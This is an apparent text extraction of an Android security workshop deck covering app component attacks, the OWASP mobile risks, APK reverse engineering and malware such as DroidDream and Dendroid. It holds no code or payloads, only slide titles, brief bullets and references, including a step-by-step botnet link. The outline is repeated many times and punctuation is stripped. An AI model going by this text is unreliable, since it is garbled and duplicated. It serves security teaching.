- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet -malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
